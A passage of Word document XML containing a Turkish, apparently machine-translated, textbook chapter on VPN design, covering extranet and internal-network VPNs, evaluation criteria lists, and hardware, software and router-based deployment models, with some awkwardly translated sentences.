      <w:r>
        <w:t>Web tarayıcısı tabanlı bir SSL kendiliğinden, basit işlem ilişkileri için iyidir, ancak bir IPSec VPN Dijital sertifika tabanlı karşılıklı kimlik doğrulama kullanan istemci / sunucu çözümü, yüksek değerli verilere erişim gerektiren kalıcı iş ilişkileri için daha uygun olabilir. İstemci tarafı sertifikalar kullanılıyorsa, tarayıcı tabanlı SSL bu tür bir uygulama için uygun olabilir. Ana fikir, kullanıcı bir dijital sertifika sayesinde bilindiğinde, VPN'in erişim kontrolü özelliklerinin bu kişiye şirketin ağındaki farklı kaynaklara erişimini sağlamak için kullanılabileceğidir. Bu kontrol seviyesi ve kullanıcının kim olduğu bilgisi, birçok şirketi dijital sertifika kullanmaya yönlendirmiştir. Açıkçası, bu büyük ölçekli extranet VPN uygulamalarında bir endişe kaynağıdır. Extranet VPN'deki PKI ile ilgili konular bu bölümün kapsamı dışındadır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Varolan bir intranet VPN, extranet VPN uygulamak için temel olarak kullanılmalı mıdır? Bağlıdır risk kabul seviyesi ve ek maliyetler. Ekstranet bağlantılarını desteklemek için bir intranetin etkinleştirilmesi, ağ üzerinde sınırlı haklara sahip yeni bir kullanıcı sınıfını tanımlamak kadar basit olabilen oldukça basit bir işlemdir.  Bununla birlikte, verilerin güvenliğini doğrudan etkileyebilecek bir extranet VPN tasarlamanın birkaç nüansı vardır. Örneğin bir extraneti etkinleştirmek için bir yaklaşım silahsızlaştırılmış bir bölge oluşturmaktır (örneğin dıştaki kullanıcıları desteklemek için çevre güvenlik duvarının üçüncü arayüzü). Bu çözüm intranet ve extranet kaynakları için güvenlik duvarı koruması ve VPN sunucusu üzerinden veri bütünlüğü ve gizliliği sağlar.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Ek 40.5, bir extranet VPN uygulaması için örnek bir değerlendirme profilini göstermektedir. Aşağıda listelenen öğelerin listesi extranet VPN için bir dizi değerlendirme kriteri geliştirilirken kullanılabilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00735EDE">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>İç Ağın Güvenliğinin Sağlanması</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="000B0851">
        <w:t>Veri gizliliğine yönelik sürekli içeriden tehdit nedeniyle, şirketler artık VPN ve güvenlik duvarları kullanarak iç ağ bölümlendirmesinin sadece daha fazla ürün satmaya çalışan güvenlik satıcıları tarafından yapılan bir satış aşaması olmadığını fark ediyorlar.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000B0851">
        <w:t>Dış tehdit artıyor olsa da, veri güvenliğine yönelik iç tehdit sabit kalıyor. Bu nedenle, ortaya çıkan bir VPN uygulaması iç ağı güvence altına almaktır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="000B0851">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Ek 40.5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Extranet VPN için Değerlendirme Profili</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Basit kullanıcı adı / şifreler üzerinden güçlü karşılıklı kimlik doğrulamayı tercih edin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="000B0851">
        <w:t>Erişim kontrolü ve günlüğe kaydetme çok önemlidir</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="000B0851">
        <w:t>Marka için müşteri özelleştirmesine izin veren çözümleri tercih edin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Minimum masaüstü ayak izi (masaüstü ortağın kontrolünde olmadığı için)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Normal uygulama kullanımına minimum müdahaleci olma</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Önceden yapılandırılmış VPN istemcisi ve politikasının sessiz kurulumu</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="000B0851">
        <w:t>VPN istemcisinin kullanım kolaylığı anahtarıdır</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Servis seviyesi izleme ve icra desteği</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Bir ağın ağ güvenliği açısından bölümlenmesinin birçok yolu vardır. Tek bir yaklaşım iç ağı mantıksal olarak bölmektir. Diğer bir yaklaşım da ağı fiziksel olarak bölmektir. VPN teknoloji her iki yaklaşımda da kullanılabilir. Örneğin, fiziksel bölümlendirme bir hedef sunucuyu doğrudan bir VPN sunucusunun arkasına yerleştirerek sağlanabilir. Burada, hedef sunucuya erişmenin tek yolu VPN sunucusunun erişim kontrol politikasını sağlamaktır. Buradaki faydalar yönetimin basitliğini, açıkça tanımlanmış sınırları ve tek bir erişim noktasını içerir. Mantıksal bölümlendirmenin bir örneği, hedef sunucuya erişmesi gereken kullanıcılara VPN istemci yazılımı verilmesi durumudur. Kullanıcılar fiziksel olarak yerel veya uzak, iç ağda herhangi bir yere yerleştirilebilir. VPN istemci yazılımı, doğrudan veya dahili bir VPN ağ geçidi aracılığıyla otomatik olarak hedef sunucuyla şifrelenmiş bir oturum oluşturur. Böylece iç ağ, erişim kontrolü yoluyla mantıksal olarak “bölümlenir”. Başka bir mantıksal bölümleme senaryosu İç ağda eşler arası VPN oturumlarının kurulması gereken durum bu olacaktır. Bu durumda, iki veya daha fazla VPN istemcisi, geçici olarak gerektiğinde VPN bağlantısı kurar. </w:t>
      </w:r>
      <w:r w:rsidRPr="000B0851">
        <w:t>Bu yapılandırmanın yararı, dinamik VPN'lerin veri gizliliğinin yanı sıra gerekli olan çok az kullanıcı yapılandırmasıyla kurulabilmesidir. VPN istemcileri, eşler arası VPN'de sağlam kullanıcı kimlik doğrulamasını desteklemiyorsa, bu yaklaşımın dezavantajı, kullanıcı kimlik doğrulama gücünü düşürür.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="004A5221">
        <w:t>Ağ hiyerarşisinde VPN işlevselliğinin nerede uygulandığı ile ilgili yerleşim vurgusunda bir değişiklik olduğu görülüyor. Microsoft Windows 2000'in piyasaya sürülmesiyle, VPN teknolojisi, daha sonra özel donanım ve yazılım kullanılarak eklenmek yerine asıl işletim sistemine dahil ediliyor. Bu gelişmeyle birlikte, iç ağın güvenliğini sağlamak için kullanılabilecek VPN entegrasyon seviyesi, doğru şekilde uygulanırsa daha da derinleşir.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> VPN teknolojisi, sunucu düzeyinde, Microsoft Windows'ta ve UNIX'in çeşitli sürümlerinde uygulanmaktadır. Her ne kadar bu, VPN entegrasyon seviyesinin iç ağı güvence altına almak için gereken her şey olduğu anlamına gelmese de, güvenlikten bina inşa kavramını teşvik eder.başlayıp, baştan sona kullanarak. Bugüne kadar bir VPN'in doğrudan hedef uygulama sunucusunda uygulanması, performans üzerinde önemli bir etkiye sahiptir; bu nedenle, kriptografik işlevler için donanım ivmesi tipik olarak gereklidir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">İç ağ içinde veri gizliliği sağlama gerekliliği aynı şekilde karşılanabilir. uzaktan erişim VPN'in uygulanmasında kullanılan dağıtım ve yönetim yaklaşımları. Kullanıcı topluluğu genellikle aynıdır. Donanım platformu, özellikle çalışanlarına laptop ve diğer taşınabilir bilgisayarlar veren pek çok şirketle aynı olabilir. Dikkat edilmesi gereken bir fark, VPN istemcisine fiziksel olarak iç ağ içinde iken uygulanacak güvenlik politikasıdır; aynı donanım platformunu kullanırken iç ağa uzaktan erişim VPN üzerinden uzaktan erişmek için gereken politikadır. </w:t>
      </w:r>
      <w:r w:rsidRPr="004A5221">
        <w:t>Durum, İnternet gibi bir toplu taşıma aracını geçerken, şirket verilerine yetkisiz erişim riskinin artması nedeniyle, kullanıcıların uzaktan giriş yaptıklarında daha sıkı bir güvenlik politikasına sahip olma konusunda temkinli olabilir. İç veya dış erişimde riskler aynı olsa da, uzaktan erişim VPN'i kullanırken saldırı olasılığı çok daha fazladır.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Dahili ağlarda, LAN'lardaki iletişim için veri gizliliği sağlamak için VPN teknolojisinin başka bir uygulaması daha </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>vardır. Potansiyel olarak yönetmenin operasyonel karmaşıklığı nedeniyle Microsoft Dosya Paylaşımı / SMB ortamındaki n-kare VPN bağlantıları, ancak, bazı şirketler tek bir "grup" veya LAN anahtarının yeterli olup olmadığını araştırıyor - bu tür dağıtımlarda, taşımadaki veri gizliliği kimlik doğrulamasından daha önemli.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="004A5221">
        <w:t>Ek 9-6'daki dahili ağ VPN uygulamasını güvence altına almak için örnek bir değerlendirme profili.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00EF5C47">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Ek 40.6</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EF5C47">
        <w:t>Dahili Ağ VPN Uygulamasının Güvenliğinin Sağlanması İçin Değerlendirme Profili</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Güçlü kullanıcı kimlik doğrulaması</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00EF5C47">
        <w:t>Güçlü erişim kontrolü</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00EF5C47">
        <w:t>Gizlilik için politika temelli şifreleme</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Transit veri bütünlüğü</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00EF5C47">
        <w:t>Dahili ağ performansına düşük etki</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00EF5C47">
        <w:t>Dahili ağ altyapısı üzerinde düşük etki</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Kullanıcı masaüstüne düşük etki</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00EF5C47">
        <w:t>Yönetim kolaylığı</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00EF5C47">
        <w:t>Mevcut ağ bileşenleri ile entegrasyon</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="8175"/>
        </w:tabs>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Operasyonel maliyetler (iş hedefine karşı tartıldığında büyük bir sorun olmayabilir)</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="8175"/>
        </w:tabs>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00EF5C47">
        <w:t>VPN istemcisi sorunları:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="8175"/>
        </w:tabs>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Kullanıcı şeffaflığı (kullanıcı farklı bir şey yapmak zorunda mı?)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00A732DC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:tabs>
          <w:tab w:val="left" w:pos="8175"/>
        </w:tabs>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Uzaktan erişim ve dahili VPN poliçesi arasında otomatik fark (VPN istemcisi, dahili / harici güvenlik politikası değişikliklerine otomatik olarak uyarlanabilir mi?)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="001F6CB0" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="8175"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF5C47">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>VPN Dağıtım Modelleri</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="001F6CB0" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001F6CB0">
        <w:t>Bu bölümde ele alınan dört VPN sunucusu dağıtım modeli vardır: özel donanım / cihaz, yazılım tabanlı, yönlendirici tabanlı ve güvenlik duvarı tabanlı. Kullanılan VPN platformunun türü, gereken güvenlik seviyesine, performans gereksinimlerine, ağ altyapısı entegrasyon çabalarına ve uygulama ve işletme maliyetlerine bağlıdır. Bu tartışma şimdi VPN olarak VPN sunucusu dağıtımıyla ilgili konulara yoğunlaşıyor müşteri dağıtımı önceki bölümlerde ele alınmıştır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00620444" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F6CB0">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Özel Donanım VPN Uygulaması</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Gelişmekte olan bir VPN sunucu platformu, özel bir donanım cihazına veya amaca yönelik yapılmış bir VPN'e aittir. </w:t>
      </w:r>
      <w:r w:rsidRPr="00E934CB">
        <w:t>Özel amaçlı donanım kullanımı, tek amaçlı, yüksek derecede optimize edilmiş tasarımının (bazı açılardan) kullanımının daha kolay, yönetilmesi kolay, anlaşılması daha kolay ve birçok durumda düşük maliyetli olduğu gerçeği nedeniyle popüler hale gelmiştir.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Bu tür bir platformun arkasındaki fikir, yaygın ev aletleri örneğine benzemektedir. Örneğin, çok az kişi bir ekmek kızartma makinesi satın alır ve sonra eve getirdikten sonra değiştirmeyi dener. Burada kavrama kavramı anahtar teslimi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Bu birimler tipik olarak standart donanım konfigürasyonlarında satılmaktadır. Amaca yönelik üretilmiş VPN cihazları, genellikle yüksek olduğunda diğer platformlara göre avantaja sahiptir. Donanımda şifreleme gerçekleştirmenin hız verimliliği nedeniyle performans. En çok amaçlı VPN cihazlar özel olarak verimli bir şekilde çalıştırılmak üzere optimize edilmiş özel bir gerçek zamanlı işletim sistemine entegre edilmiştir tasarlanmış donanım. </w:t>
      </w:r>
      <w:r w:rsidRPr="007A0607">
        <w:t xml:space="preserve">Birçok düşük kaliteli VPN cihazı, Intel platformunda çalışan, değiştirilmiş bir Linux veya BSD işletim sistemi kullanır. Birçok VPN cihazı önceden yapılandırılabilir, uzak bir siteye gönderilebilir ve kolayca kurulabilir ve uzaktan yönetilebilir. Buradaki avantaj, büyük ölçekli dağıtımlarda hızlı uygulamadır. Bu dağıtım modeli, birçok uzak ofis, büyük telekom operatörü, ISS ve yönetilen güvenlik hizmeti sağlayıcısı olan büyük işletmeler tarafından </w:t>
      </w:r>
      <w:r w:rsidRPr="007A0607">
        <w:lastRenderedPageBreak/>
        <w:t>kullanılır. Bir kuruluşta BT personeli yetersizse, VPN cihazları yüksek oranda dağıtılmış bir VPN uygulamak için insan kaynakları gereksinimini büyük ölçüde azaltabilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Donanım VPN aygıtları kullanarak büyük ölçekli, yüksek oranda dağıtılmış bir VPN dağıtmaya yönelik bir yaklaşım:cihaz tarafından kullanılacak temel ağ parametrelerini önceden yapılandırın, (2) VPN'i önceden kurun cihazın dijital sertifikası, (3) cihazı uzak konumuna gönderir ve (4) sonra Uzak konum, cihazın temel fiziksel kurulumunu gerçekleştirir. </w:t>
      </w:r>
      <w:r w:rsidRPr="007A0607">
        <w:t>Ünite elektrik prizine takıldıktan ve açıldıktan sonra, ağ kabloları bağlanabilir ve ünite daha sonra gerektiğinde yapılandırma görevlerini tamamlamak için uzaktan yönetim için hazır olmalıdır.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> VPN kullanımının sakıncaları ev aletleri yaklaşımı, VPN ev aletleri ürününün tek bedene uyan her tasarım konseptini içermez.daima bir VPN cihazında donanım değişikliklerini satıcının desteğine izin verin. Ek olarak, tescilli işletim sistemleri kullanan VPN cihazları başka bir işletim sisteminin öğrenilmesi anlamına gelebilir ve mevcut sistem yönetimi araçlarıyla net bir şekilde birlikte çalışmayabilir. Sonuç olarak: eğer bir VPN cihazının donanımını kendiniz değiştirmeyi planlıyorsanız, o zaman VPN cihazları gitmenin yolu olmayabilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Birçok taşıyıcı sınıfı VPN anahtarı - on binlerce kişiyi sağlayabilen VPN ağ geçitleri ayrı bağlantılar - telcos, ISS'ler veya büyük işletme işletme ağları gibi büyük ölçekli telekomünikasyon ağlarının gereksinimlerine uyan başka bir VPN bileşeni sınıfıdır. Taşıyıcı sınıfı VPN'in özellikleri ağ geçitleri daha az deneyimli personelin performans göstermesine olanak sağlayan hızlı ve kolay kurulum ve konfigürasyon içerir tesisatlar. Yüksek verimlilik, yani büyümekte olan bir işletmenin ihtiyaçlarını karşılayabilir ve dağıtımı kolay istemci yazılımı ayrıca taşıyıcı sınıfı VPN ağ geçitleri için farklılaştırıcılardır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="007A0607" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A0607">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Yazılım Tabanlı VPN</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Yazılım tabanlı VPN sunucuları genellikle VPN yazılımının genel amaçlı bir bilgisayara kurulmasını gerektirir. genel amaçlı bir işletim sisteminde çalışan. Desteklenen tipik işletim sistemleri olma eğilimindedir. Hangi işletim sistemi olursa olsun pazar lideridir. </w:t>
      </w:r>
      <w:r w:rsidRPr="007A0607">
        <w:t>Bu, Microsoft Windows tabanlı ve UNIX tabanlı işletim sistemlerini de içeriyor. Bazı yazılım tabanlı VPN'ler kurulum sırasında işletim sistemini değiştirerek güvenlik sağlamlaştırması, bir miktar performans optimizasyonu veya ağ arayüz kartlarının ince ayarını yapacaktır.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Yazılım tabanlı VPN'ler, VPN stratejisinin, cihazın anahtar teslimi konseptinden dolayı bir şekilde VPN donanımının ana bileşenlerini yükseltmesi veya "düzenlemesi" durumunda gösterilebilir. yaklaşım. Ayrıca, VPN yazılımı yaklaşımı, mevcut olanı kullanarak maliyetleri en aza indirmeyi planlıyorsa belirtilir.genel amaçlı bilgi işlem donanımı.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Yazılım tabanlı VPN sunucularının dezavantajları tipik olarak karşılaştırıldığında performans düşüşüdür. amaca yönelik inşa edilmiş VPN cihazları, sunucu donanımı ve işletim sistemi mevcut değilse edinilmelidir, donanım şifreleme kartları için ek ücret ve işlemi sertleştirmek için gereken ilave çaba sistemi. Yük dengeleme ve donanım şifrelemesi kullanma gibi uygun ölçeklenebilirlik tekniklerinin uygulanması Ek kartlar bu dezavantajları azaltabilir. Ayrıca, yalnızca VPN yazılımı yaklaşımı, genellikle daha düşük maliyetli bir peşin alım fiyatına sahiptir. Bazen, yazılım işletim sistemine yerleşiktir; örneğin, Microsoft Windows 2000 Server bir IPSec VPN sunucusu içerir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Bazı üreticilerin yazılım VPN ürünleri, merkezi bir yönetim konsolu kullanılarak yönetilemeyen veya her platformda farklı bir görünüme sahip olan birden fazla platformda desteklenir. Tutarlı sağlamak için uygulama ve yönetilebilirlik, donanım platformlarında ve işletim sistemlerinde standardize olmak mantıklı geliyor. Platformlarda standardizasyon sağlayarak, öğrenme eğrisi en aza indirilebilir ve platform tabanlı özel durumlar ortadan kaldırılabilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A0607">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Router Tabanlı VPN'ler</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
